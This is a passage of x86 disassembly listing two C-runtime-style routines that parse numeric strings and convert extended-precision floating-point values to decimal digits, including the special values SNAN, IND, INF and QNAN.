		mov	[ebp+var_74], 8000h
		jmp	short loc_412822
; ---------------------------------------------------------------------------

loc_412880:				; CODE XREF: sub_41279D+C4j
		and	[ebp+var_74], 0
		push	2
		pop	ecx
		jmp	short loc_412822
; ---------------------------------------------------------------------------

loc_412889:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	cl, al		; jumptable 0041282E case 1
		sub	cl, 31h
		cmp	cl, 8
		mov	[ebp+var_58], esi
		jbe	short loc_41283F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_4128AB

loc_4128A7:				; CODE XREF: sub_41279D+1A7j
		push	4
		jmp	short loc_412858
; ---------------------------------------------------------------------------

loc_4128AB:				; CODE XREF: sub_41279D+108j
		cmp	al, 2Bh
		jz	short loc_4128D7
		cmp	al, 2Dh
		jz	short loc_4128D7
		cmp	al, bl
		jz	short loc_412870

loc_4128B7:				; CODE XREF: sub_41279D+1B5j
		cmp	al, 43h
		jle	loc_4129FB
		cmp	al, 45h
		jle	short loc_4128D3
		cmp	al, 63h
		jle	loc_4129FB
		cmp	al, 65h
		jg	loc_4129FB

loc_4128D3:				; CODE XREF: sub_41279D+124j
		push	6
		jmp	short loc_412858
; ---------------------------------------------------------------------------

loc_4128D7:				; CODE XREF: sub_41279D+110j
					; sub_41279D+114j ...
		dec	edx
		push	0Bh
		jmp	loc_412858
; ---------------------------------------------------------------------------

loc_4128DF:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	cl, al		; jumptable 0041282E case 2
		sub	cl, 31h
		cmp	cl, 8
		jbe	loc_41283F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_412856
		cmp	al, bl
		jz	loc_412870

loc_41290A:				; CODE XREF: sub_41279D+1F9j
					; sub_41279D:loc_4129C9j
		mov	edx, [ebp+var_54]
		jmp	loc_412A26
; ---------------------------------------------------------------------------

loc_412912:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	[ebp+var_58], esi ; jumptable 0041282E case 3
		jmp	short loc_412931
; ---------------------------------------------------------------------------

loc_412917:				; CODE XREF: sub_41279D+196j
		cmp	al, 39h
		jg	short loc_412935
		cmp	[ebp+var_4C], 19h
		jnb	short loc_41292B
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		jmp	short loc_41292E
; ---------------------------------------------------------------------------

loc_41292B:				; CODE XREF: sub_41279D+182j
		inc	[ebp+var_50]

loc_41292E:				; CODE XREF: sub_41279D+18Cj
		mov	al, [edx]
		inc	edx

loc_412931:				; CODE XREF: sub_41279D+178j
		cmp	al, bl
		jge	short loc_412917

loc_412935:				; CODE XREF: sub_41279D+17Cj
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_4128A7

loc_41294A:				; CODE XREF: sub_41279D+1D6j
					; sub_41279D+1F0j
		cmp	al, 2Bh
		jz	short loc_4128D7
		cmp	al, 2Dh
		jz	short loc_4128D7
		jmp	loc_4128B7
; ---------------------------------------------------------------------------

loc_412957:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		cmp	[ebp+var_4C], 0	; jumptable 0041282E case 4
		mov	[ebp+var_58], esi
		mov	[ebp+var_5C], esi
		jnz	short loc_412989
		jmp	short loc_41296B
; ---------------------------------------------------------------------------

loc_412965:				; CODE XREF: sub_41279D+1D0j
		dec	[ebp+var_50]
		mov	al, [edx]
		inc	edx

loc_41296B:				; CODE XREF: sub_41279D+1C6j
		cmp	al, bl
		jz	short loc_412965
		jmp	short loc_412989
; ---------------------------------------------------------------------------

loc_412971:				; CODE XREF: sub_41279D+1EEj
		cmp	al, 39h
		jg	short loc_41294A
		cmp	[ebp+var_4C], 19h
		jnb	short loc_412986
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		dec	[ebp+var_50]

loc_412986:				; CODE XREF: sub_41279D+1DCj
		mov	al, [edx]
		inc	edx

loc_412989:				; CODE XREF: sub_41279D+1C4j
					; sub_41279D+1D2j
		cmp	al, bl
		jge	short loc_412971
		jmp	short loc_41294A
; ---------------------------------------------------------------------------

loc_41298F:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		sub	al, bl		; jumptable 0041282E case 5
		cmp	al, 9
		mov	[ebp+var_5C], esi
		ja	loc_41290A
		push	4
		jmp	loc_412841
; ---------------------------------------------------------------------------

loc_4129A3:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		lea	ecx, [edx-2]	; jumptable 0041282E case 6
		mov	[ebp+var_54], ecx
		mov	cl, al
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_4129BA

loc_4129B3:				; CODE XREF: sub_41279D+25Cj
					; sub_41279D+269j
		push	9
		jmp	loc_412841
; ---------------------------------------------------------------------------

loc_4129BA:				; CODE XREF: sub_41279D+214j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_4129E2
		dec	eax
		dec	eax
		jz	short loc_4129D6
		sub	eax, 3

loc_4129C9:				; CODE XREF: sub_41279D+26Dj
		jnz	loc_41290A
		push	8
		jmp	loc_412858
; ---------------------------------------------------------------------------

loc_4129D6:				; CODE XREF: sub_41279D+227j
					; sub_41279D+285j
		or	[ebp+var_68], 0FFFFFFFFh
		push	7
		pop	ecx
		jmp	loc_412822
; ---------------------------------------------------------------------------

loc_4129E2:				; CODE XREF: sub_41279D+223j
					; sub_41279D+281j
		push	7
		jmp	loc_412858
; ---------------------------------------------------------------------------

loc_4129E9:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	[ebp+var_60], esi ; jumptable 0041282E case 8
		jmp	short loc_4129F1
; ---------------------------------------------------------------------------

loc_4129EE:				; CODE XREF: sub_41279D+256j
		mov	al, [edx]
		inc	edx

loc_4129F1:				; CODE XREF: sub_41279D+24Fj
		cmp	al, bl
		jz	short loc_4129EE
		sub	al, 31h
		cmp	al, 8
		jbe	short loc_4129B3

loc_4129FB:				; CODE XREF: sub_41279D+CDj
					; sub_41279D+11Cj ...
		dec	edx
		jmp	short loc_412A26
; ---------------------------------------------------------------------------

loc_4129FE:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	cl, al		; jumptable 0041282E case 7
		sub	cl, 31h
		cmp	cl, 8
		jbe	short loc_4129B3
		cmp	al, bl
		jmp	short loc_4129C9
; ---------------------------------------------------------------------------

loc_412A0C:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		cmp	[ebp+arg_18], 0	; jumptable 0041282E case 11
		jz	short loc_412A59
		movsx	eax, al
		sub	eax, 2Bh
		lea	ecx, [edx-1]
		mov	[ebp+var_54], ecx
		jz	short loc_4129E2
		dec	eax
		dec	eax
		jz	short loc_4129D6
		mov	edx, ecx

loc_412A26:				; CODE XREF: sub_41279D+170j
					; sub_41279D+25Fj ...
		cmp	[ebp+var_58], 0
		mov	eax, [ebp+var_70]
		mov	[eax], edx
		jz	loc_412DDA
		push	18h
		pop	eax
		cmp	[ebp+var_4C], eax
		jbe	short loc_412A4D
		cmp	[ebp+var_9], 5
		jl	short loc_412A46
		inc	[ebp+var_9]

loc_412A46:				; CODE XREF: sub_41279D+2A4j
		dec	edi
		inc	[ebp+var_50]
		mov	[ebp+var_4C], eax

loc_412A4D:				; CODE XREF: sub_41279D+29Ej
		cmp	[ebp+var_4C], 0
		jbe	loc_412E01
		jmp	short loc_412AB2
; ---------------------------------------------------------------------------

loc_412A59:				; CODE XREF: sub_41279D+273j
		push	0Ah
		pop	ecx
		dec	edx

loc_412A5D:				; CODE XREF: sub_41279D+8Bj
					; sub_41279D+91j
					; DATA XREF: ...
		cmp	ecx, 0Ah	; default
					; jumptable 0041282E case 10
		jnz	loc_412822
		jmp	short loc_412A26
; ---------------------------------------------------------------------------

loc_412A68:				; CODE XREF: sub_41279D+91j
					; DATA XREF: .text:off_412E31o
		mov	[ebp+var_60], esi ; jumptable 0041282E case 9
		xor	ecx, ecx
		jmp	short loc_412A88
; ---------------------------------------------------------------------------

loc_412A6F:				; CODE XREF: sub_41279D+2EDj
		cmp	al, 39h
		jg	short loc_412A93
		imul	ecx, 0Ah
		movsx	esi, al
		lea	ecx, [ecx+esi-30h]
		cmp	ecx, 1450h
		jg	short loc_412A8E
		mov	al, [edx]
		inc	edx

loc_412A88:				; CODE XREF: sub_41279D+2D0j
		cmp	al, bl
		jge	short loc_412A6F
		jmp	short loc_412A93
; ---------------------------------------------------------------------------

loc_412A8E:				; CODE XREF: sub_41279D+2E6j
		mov	ecx, 1451h

loc_412A93:				; CODE XREF: sub_41279D+2D4j
					; sub_41279D+2EFj
		mov	[ebp+var_64], ecx
		jmp	short loc_412AA3
; ---------------------------------------------------------------------------

loc_412A98:				; CODE XREF: sub_41279D+308j
		cmp	al, 39h
		jg	loc_4129FB
		mov	al, [edx]
		inc	edx

loc_412AA3:				; CODE XREF: sub_41279D+2F9j
		cmp	al, bl
		jge	short loc_412A98
		jmp	loc_4129FB
; ---------------------------------------------------------------------------

loc_412AAC:				; CODE XREF: sub_41279D+319j
		dec	[ebp+var_4C]
		inc	[ebp+var_50]

loc_412AB2:				; CODE XREF: sub_41279D+2BAj
		dec	edi
		cmp	byte ptr [edi],	0
		jz	short loc_412AAC
		lea	eax, [ebp+var_3C]
		push	eax
		push	[ebp+var_4C]
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_413B5A
		mov	eax, [ebp+var_64]
		xor	ecx, ecx
		add	esp, 0Ch
		cmp	[ebp+var_68], ecx
		jge	short loc_412AD7
		neg	eax

loc_412AD7:				; CODE XREF: sub_41279D+336j
		add	eax, [ebp+var_50]
		cmp	[ebp+var_60], ecx
		jnz	short loc_412AE2
		add	eax, [ebp+arg_10]

loc_412AE2:				; CODE XREF: sub_41279D+340j
		cmp	[ebp+var_5C], ecx
		jnz	short loc_412AEA
		sub	eax, [ebp+arg_14]

loc_412AEA:				; CODE XREF: sub_41279D+348j
		cmp	eax, 1450h
		jg	loc_412DE3
		cmp	eax, 0FFFFEBB0h
		jl	loc_412DFA
		mov	esi, offset dword_424260
		sub	esi, 60h
		cmp	eax, ecx
		mov	[ebp+var_54], eax
		jz	loc_412DC8
		jge	short loc_412B22
		neg	eax
		mov	esi, offset dword_4243C0
		mov	[ebp+var_54], eax
		sub	esi, 60h

loc_412B22:				; CODE XREF: sub_41279D+376j
		cmp	[ebp+arg_C], ecx
		jnz	short loc_412B2B
		mov	word ptr [ebp+var_3C], cx

loc_412B2B:				; CODE XREF: sub_41279D+388j
		cmp	[ebp+var_54], ecx
		jz	loc_412DC8

loc_412B34:				; CODE XREF: sub_41279D+625j
		mov	eax, [ebp+var_54]
		sar	[ebp+var_54], 3
		add	esi, 54h
		and	eax, 7
		test	eax, eax
		mov	[ebp+var_4C], esi
		jz	loc_412DBE
		imul	eax, 0Ch
		add	eax, esi
		mov	ebx, eax
		cmp	word ptr [ebx],	8000h
		mov	[ebp+var_70], ebx
		jb	short loc_412B71
		mov	esi, ebx
		lea	edi, [ebp+var_48]
		movsd
		movsd
		movsd
		dec	[ebp+var_46]
		mov	esi, [ebp+var_4C]
		lea	ebx, [ebp+var_48]
		mov	[ebp+var_70], ebx

loc_412B71:				; CODE XREF: sub_41279D+3BEj
		movzx	edx, word ptr [ebx+0Ah]
		mov	ecx, [ebp+var_32]
		xor	eax, eax
		mov	[ebp+var_50], eax
		mov	[ebp+var_2C], eax
		mov	[ebp+var_28], eax
		mov	[ebp+var_24], eax
		mov	eax, edx
		mov	edi, 7FFFh
		xor	eax, ecx
		and	ecx, edi
		and	edx, edi
		and	eax, 8000h
		cmp	cx, 7FFFh
		lea	edi, [edx+ecx]
		movzx	edi, di
		jnb	loc_412DA4
		cmp	dx, 7FFFh
		jnb	loc_412DA4
		cmp	di, 0BFFDh
		ja	loc_412DA4
		cmp	di, 3FBFh
		ja	short loc_412BD3
		xor	eax, eax
		mov	[ebp+var_38], eax
		mov	[ebp+var_3C], eax
		jmp	loc_412DBB
; ---------------------------------------------------------------------------

loc_412BD3:				; CODE XREF: sub_41279D+427j
		test	cx, cx
		jnz	short loc_412BF7
		inc	edi
		test	dword ptr [ebp-34h], 7FFFFFFFh
		jnz	short loc_412BF7
		cmp	[ebp+var_38], 0
		jnz	short loc_412BF7
		cmp	[ebp+var_3C], 0
		jnz	short loc_412BF7
		and	word ptr [ebp+var_32], cx
		jmp	loc_412DBE
; ---------------------------------------------------------------------------

loc_412BF7:				; CODE XREF: sub_41279D+439j
					; sub_41279D+443j ...
		xor	ecx, ecx
		cmp	dx, cx
		jnz	short loc_412C1F
		inc	edi
		test	dword ptr [ebx+8], 7FFFFFFFh
		jnz	short loc_412C1F
		cmp	[ebx+4], ecx
		jnz	short loc_412C1F
		cmp	[ebx], ecx
		jnz	short loc_412C1F
		mov	[ebp-34h], ecx
		mov	[ebp+var_38], ecx
		mov	[ebp+var_3C], ecx
		jmp	loc_412DBE
; ---------------------------------------------------------------------------

loc_412C1F:				; CODE XREF: sub_41279D+45Fj
					; sub_41279D+469j ...
		and	[ebp+var_68], ecx
		lea	esi, [ebp+var_28]
		mov	[ebp+var_58], 5

loc_412C2C:				; CODE XREF: sub_41279D+4FFj
		mov	ecx, [ebp+var_68]
		mov	edx, [ebp+var_58]
		add	ecx, ecx
		test	edx, edx
		mov	[ebp+var_64], edx
		jle	short loc_412C90
		lea	ecx, [ebp+ecx+var_3C]
		add	ebx, 8
		mov	[ebp+var_5C], ecx
		mov	[ebp+var_60], ebx

loc_412C48:				; CODE XREF: sub_41279D+4EEj
		mov	ecx, [ebp+var_60]
		mov	edx, [ebp+var_5C]
		movzx	edx, word ptr [edx]
		movzx	ecx, word ptr [ecx]
		and	[ebp+var_78], 0
		imul	ecx, edx
		mov	edx, [esi-4]
		lea	ebx, [edx+ecx]
		cmp	ebx, edx
		jb	short loc_412C69
		cmp	ebx, ecx
		jnb	short loc_412C70

loc_412C69:				; CODE XREF: sub_41279D+4C6j
		mov	[ebp+var_78], 1

loc_412C70:				; CODE XREF: sub_41279D+4CAj
		cmp	[ebp+var_78], 0
		mov	[esi-4], ebx
		jz	short loc_412C7C
		inc	word ptr [esi]

loc_412C7C:				; CODE XREF: sub_41279D+4DAj
		add	[ebp+var_5C], 2
		sub	[ebp+var_60], 2
		dec	[ebp+var_64]
		cmp	[ebp+var_64], 0
		jg	short loc_412C48
		mov	ebx, [ebp+var_70]

loc_412C90:				; CODE XREF: sub_41279D+49Cj
		inc	esi
		inc	esi
		inc	[ebp+var_68]
		dec	[ebp+var_58]
		cmp	[ebp+var_58], 0
		jg	short loc_412C2C
		add	edi, 0C002h
		test	di, di
		jle	short loc_412CE4

loc_412CA9:				; CODE XREF: sub_41279D+540j
		test	[ebp+var_24], 80000000h
		jnz	short loc_412CDF
		mov	esi, [ebp+var_28]
		mov	ecx, [ebp+var_2C]
		shl	[ebp+var_2C], 1
		shr	ecx, 1Fh
		mov	edx, esi
		add	esi, esi
		or	esi, ecx
		mov	ecx, [ebp+var_24]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		add	edi, 0FFFFh
		test	di, di
		mov	[ebp+var_28], esi
		mov	[ebp+var_24], ecx
		jg	short loc_412CA9

loc_412CDF:				; CODE XREF: sub_41279D+513j
		test	di, di
		jg	short loc_412D32

loc_412CE4:				; CODE XREF: sub_41279D+50Aj
		add	edi, 0FFFFh
		test	di, di
		jge	short loc_412D32
		mov	ecx, edi
		neg	ecx
		movzx	esi, cx
		add	edi, esi

loc_412CF8:				; CODE XREF: sub_41279D+588j
		test	byte ptr [ebp+var_2C], 1
		jz	short loc_412D01
		inc	[ebp+var_50]

loc_412D01:				; CODE XREF: sub_41279D+55Fj
		mov	ecx, [ebp+var_24]
		mov	ebx, [ebp+var_28]
		mov	edx, [ebp+var_28]
		shr	[ebp+var_24], 1
		shl	ecx, 1Fh
		shr	ebx, 1
		or	ebx, ecx
		mov	ecx, [ebp+var_2C]
		shl	edx, 1Fh
		shr	ecx, 1
		or	ecx, edx
		dec	esi
		mov	[ebp+var_28], ebx
		mov	[ebp+var_2C], ecx
		jnz	short loc_412CF8
		cmp	[ebp+var_50], 0
		jz	short loc_412D32
		or	word ptr [ebp+var_2C], 1

loc_412D32:				; CODE XREF: sub_41279D+545j
					; sub_41279D+550j ...
		cmp	word ptr [ebp+var_2C], 8000h
		ja	short loc_412D4B
		mov	ecx, [ebp+var_2C]
		and	ecx, 1FFFFh
		cmp	ecx, 18000h
		jnz	short loc_412D7E

loc_412D4B:				; CODE XREF: sub_41279D+59Bj
		cmp	[ebp+var_2C+2],	0FFFFFFFFh
		jnz	short loc_412D7B
		and	[ebp+var_2C+2],	0
		cmp	[ebp+var_28+2],	0FFFFFFFFh
		jnz	short loc_412D76
		and	[ebp+var_28+2],	0
		cmp	word ptr [ebp+var_24+2], 0FFFFh
		jnz	short loc_412D70
		mov	word ptr [ebp+var_24+2], 8000h
		inc	edi
		jmp	short loc_412D7E
; ---------------------------------------------------------------------------

loc_412D70:				; CODE XREF: sub_41279D+5C8j
		inc	word ptr [ebp+var_24+2]
		jmp	short loc_412D7E
; ---------------------------------------------------------------------------

loc_412D76:				; CODE XREF: sub_41279D+5BCj
		inc	[ebp+var_28+2]
		jmp	short loc_412D7E
; ---------------------------------------------------------------------------

loc_412D7B:				; CODE XREF: sub_41279D+5B2j
		inc	[ebp+var_2C+2]

loc_412D7E:				; CODE XREF: sub_41279D+5ACj
					; sub_41279D+5D1j ...
		cmp	di, 7FFFh
		mov	esi, [ebp+var_4C]
		jnb	short loc_412DA4
		mov	cx, word ptr [ebp+var_2C+2]
		mov	word ptr [ebp+var_3C], cx
		mov	ecx, [ebp+var_28]
		mov	[ebp+var_3C+2],	ecx
		mov	ecx, [ebp+var_24]
		or	edi, eax
		mov	[ebp+var_38+2],	ecx
		mov	word ptr [ebp+var_32], di
		jmp	short loc_412DBE
; ---------------------------------------------------------------------------

loc_412DA4:				; CODE XREF: sub_41279D+406j
					; sub_41279D+411j ...
		neg	ax
		sbb	eax, eax
		and	[ebp+var_38], 0
		and	eax, 80000000h
		add	eax, 7FFF8000h
		and	[ebp+var_3C], 0

loc_412DBB:				; CODE XREF: sub_41279D+431j
		mov	[ebp-34h], eax

loc_412DBE:				; CODE XREF: sub_41279D+3A9j
					; sub_41279D+455j ...
		cmp	[ebp+var_54], 0
		jnz	loc_412B34

loc_412DC8:				; CODE XREF: sub_41279D+370j
					; sub_41279D+391j
		mov	eax, [ebp-34h]
		movzx	ecx, word ptr [ebp+var_3C]
		mov	esi, [ebp+var_3C+2]
		mov	edx, [ebp+var_38+2]
		shr	eax, 10h
		jmp	short loc_412E09
; ---------------------------------------------------------------------------

loc_412DDA:				; CODE XREF: sub_41279D+292j
		mov	[ebp+var_6C], 4
		jmp	short loc_412E01
; ---------------------------------------------------------------------------

loc_412DE3:				; CODE XREF: sub_41279D+352j
		xor	esi, esi
		mov	eax, 7FFFh
		mov	edx, 80000000h
		xor	ecx, ecx
		mov	[ebp+var_6C], 2
		jmp	short loc_412E09
; ---------------------------------------------------------------------------

loc_412DFA:				; CODE XREF: sub_41279D+35Dj
		mov	[ebp+var_6C], 1

loc_412E01:				; CODE XREF: sub_41279D+2B4j
					; sub_41279D+644j
		xor	ecx, ecx
		xor	eax, eax
		xor	edx, edx
		xor	esi, esi

loc_412E09:				; CODE XREF: sub_41279D+63Bj
					; sub_41279D+65Bj
		mov	edi, [ebp+var_7C]
		or	eax, [ebp+var_74]
		mov	[edi], cx
		mov	[edi+0Ah], ax
		mov	eax, [ebp+var_6C]
		mov	[edi+2], esi
		mov	[edi+6], edx

loc_412E1F:				; CODE XREF: sub_41279D+63j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_41279D	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_412E31	dd offset loc_412835	; DATA XREF: sub_41279D+91r
		dd offset loc_412889	; jump table for switch	statement
		dd offset loc_4128DF
		dd offset loc_412912
		dd offset loc_412957
		dd offset loc_41298F
		dd offset loc_4129A3
		dd offset loc_4129FE
		dd offset loc_4129E9
		dd offset loc_412A68
		dd offset loc_412A5D
		dd offset loc_412A0C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_412E61	proc near		; CODE XREF: sub_411B21+3Fp

var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1A		= dword	ptr -1Ah
var_16		= dword	ptr -16h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 74h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_14]
		push	esi
		push	edi
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsw
		mov	edx, [ebp+var_8]
		mov	ecx, edx
		mov	eax, 8000h
		and	ecx, eax
		and	edx, 7FFFh
		test	cx, cx
		mov	[ebp+var_60], ebx
		mov	byte ptr [ebp+var_30], 0CCh
		mov	byte ptr [ebp+var_30+1], 0CCh
		mov	byte ptr [ebp+var_30+2], 0CCh
		mov	byte ptr [ebp+var_30+3], 0CCh
		mov	byte ptr [ebp+var_2C], 0CCh
		mov	byte ptr [ebp+var_2C+1], 0CCh
		mov	byte ptr [ebp+var_2C+2], 0CCh
		mov	byte ptr [ebp+var_2C+3], 0CCh
		mov	byte ptr [ebp+var_28], 0CCh
		mov	byte ptr [ebp+var_28+1], 0CCh
		mov	byte ptr [ebp+var_28+2], 0FBh
		mov	byte ptr [ebp+var_28+3], 3Fh
		mov	[ebp+var_74], 1
		mov	[ebp+var_6C], ecx
		jz	short loc_412EDB
		mov	byte ptr [ebx+2], 2Dh
		jmp	short loc_412EDF
; ---------------------------------------------------------------------------

loc_412EDB:				; CODE XREF: sub_412E61+72j
		mov	byte ptr [ebx+2], 20h

loc_412EDF:				; CODE XREF: sub_412E61+78j
		test	dx, dx
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jnz	short loc_412F18
		test	esi, esi
		jnz	short loc_412F18
		test	edi, edi
		jnz	short loc_412F18
		and	[ebx], di
		cmp	cx, ax
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[ebx+2], al
		mov	byte ptr [ebx+3], 1
		mov	byte ptr [ebx+4], 30h
		mov	byte ptr [ebx+5], 0

loc_412F10:				; CODE XREF: sub_412E61+6FBj
					; sub_412E61+8C3j
		xor	eax, eax
		inc	eax
		jmp	loc_4136E1
; ---------------------------------------------------------------------------

loc_412F18:				; CODE XREF: sub_412E61+87j
					; sub_412E61+8Bj ...
		cmp	dx, 7FFFh
		jnz	loc_412FC1
		mov	eax, 80000000h
		cmp	esi, eax
		mov	word ptr [ebx],	1
		jnz	short loc_412F35
		test	edi, edi
		jz	short loc_412F44

loc_412F35:				; CODE XREF: sub_412E61+CEj
		test	esi, 40000000h
		jnz	short loc_412F44
		push	offset a1Snan	; "1#SNAN"
		jmp	short loc_412F95
; ---------------------------------------------------------------------------

loc_412F44:				; CODE XREF: sub_412E61+D2j
					; sub_412E61+DAj
		test	cx, cx
		jz	short loc_412F5C
		cmp	esi, 0C0000000h
		jnz	short loc_412F5C
		test	edi, edi
		jnz	short loc_412F90
		push	offset a1Ind	; "1#IND"
		jmp	short loc_412F69
; ---------------------------------------------------------------------------

loc_412F5C:				; CODE XREF: sub_412E61+E6j
					; sub_412E61+EEj
		cmp	esi, eax
		jnz	short loc_412F90
		test	edi, edi
		jnz	short loc_412F90
		push	offset a1Inf	; "1#INF"

loc_412F69:				; CODE XREF: sub_412E61+F9j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407A85
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_412F8A
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_412F8A:				; CODE XREF: sub_412E61+11Aj
		mov	byte ptr [ebx+3], 5
		jmp	short loc_412FBA
; ---------------------------------------------------------------------------

loc_412F90:				; CODE XREF: sub_412E61+F2j
					; sub_412E61+FDj ...
		push	offset a1Qnan	; "1#QNAN"

loc_412F95:				; CODE XREF: sub_412E61+E1j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407A85
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_412FB6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4031FD
		add	esp, 14h

loc_412FB6:				; CODE XREF: sub_412E61+146j
		mov	byte ptr [ebx+3], 6

loc_412FBA:				; CODE XREF: sub_412E61+12Dj
		xor	eax, eax
		jmp	loc_4136E1
; ---------------------------------------------------------------------------

loc_412FC1:				; CODE XREF: sub_412E61+BCj
		movzx	ecx, dx
		mov	ebx, ecx
		imul	ecx, 4D10h
		shr	ebx, 8
		mov	eax, esi
		shr	eax, 18h
		lea	eax, [ebx+eax*2]
		imul	eax, 4Dh
		lea	eax, [eax+ecx-134312F4h]
		sar	eax, 10h
		movzx	ecx, ax
		movsx	ebx, cx
		mov	[ebp+var_4C], ecx
		xor	eax, eax
		mov	ecx, offset dword_424260
		neg	ebx
		sub	ecx, 60h
		cmp	ebx, eax
		mov	word ptr [ebp+var_16], dx
		mov	[ebp+var_1A], esi
		mov	[ebp+var_20+2],	edi
		mov	word ptr [ebp+var_20], ax
		mov	[ebp+var_68], ecx
		jz	loc_4132C0
		jge	short loc_413021
		mov	ecx, offset dword_4243C0
		neg	ebx
		sub	ecx, 60h
		mov	[ebp+var_68], ecx

loc_413021:				; CODE XREF: sub_412E61+1B1j
		cmp	ebx, eax
		jz	loc_4132C0

loc_413029:				; CODE XREF: sub_412E61+457j
		add	[ebp+var_68], 54h
		mov	ecx, ebx
		and	ecx, 7
		sar	ebx, 3
		test	ecx, ecx
		jz	loc_4132B6
		imul	ecx, 0Ch
		add	ecx, [ebp+var_68]
		cmp	word ptr [ecx],	8000h
		mov	[ebp+var_64], ecx
		jb	short loc_413060
		mov	esi, ecx
		lea	edi, [ebp+var_3C]
		movsd
		movsd
		lea	eax, [ebp+var_3C]
		movsd
		dec	[ebp+var_3C+2]
		mov	[ebp+var_64], eax
		mov	ecx, eax

loc_413060:				; CODE XREF: sub_412E61+1EAj
		movzx	edi, word ptr [ecx+0Ah]
		mov	edx, [ebp+var_16]
		xor	eax, eax
		mov	ecx, edi
		mov	esi, 7FFFh
		xor	ecx, edx
		and	edx, esi
		and	edi, esi
		mov	[ebp+var_48], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		and	ecx, 8000h
		cmp	dx, si
		lea	eax, [edi+edx]
		movzx	eax, ax
		jnb	loc_41329A
		cmp	di, si
		jnb	loc_41329A
		cmp	ax, 0BFFDh
		ja	loc_41329A
		cmp	ax, 3FBFh
		ja	short loc_4130C0
		xor	eax, eax
		mov	[ebp+var_1A+2],	eax
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		jmp	loc_4132B6
; ---------------------------------------------------------------------------

loc_4130C0:				; CODE XREF: sub_412E61+24Dj
		xor	esi, esi
		cmp	dx, si
		jnz	short loc_4130E4
		inc	eax
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_4130E4
		cmp	[ebp-1Ch], esi
		jnz	short loc_4130E4
		cmp	[ebp+var_20], esi
		jnz	short loc_4130E4
		mov	word ptr [ebp+var_16], si
		jmp	loc_4132B6
; ---------------------------------------------------------------------------

loc_4130E4:				; CODE XREF: sub_412E61+264j
					; sub_412E61+26Ej ...
		cmp	di, si
		jnz	short loc_41310D
		mov	edx, [ebp+var_64]
		inc	eax
		test	dword ptr [edx+8], 7FFFFFFFh
		jnz	short loc_41310D
		cmp	[edx+4], esi
		jnz	short loc_41310D
		cmp	[edx], esi
		jnz	short loc_41310D
		mov	[ebp+var_1A+2],	esi
		mov	[ebp-1Ch], esi
		mov	[ebp+var_20], esi
		jmp	loc_4132B6
; ---------------------------------------------------------------------------

loc_41310D:				; CODE XREF: sub_412E61+286j
					; sub_412E61+293j ...
		lea	edi, [ebp+var_C]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_44], edi
		mov	[ebp+var_40], 5

loc_41311D:				; CODE XREF: sub_412E61+332j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_413184
		lea	edx, [ebp+edx+var_20]
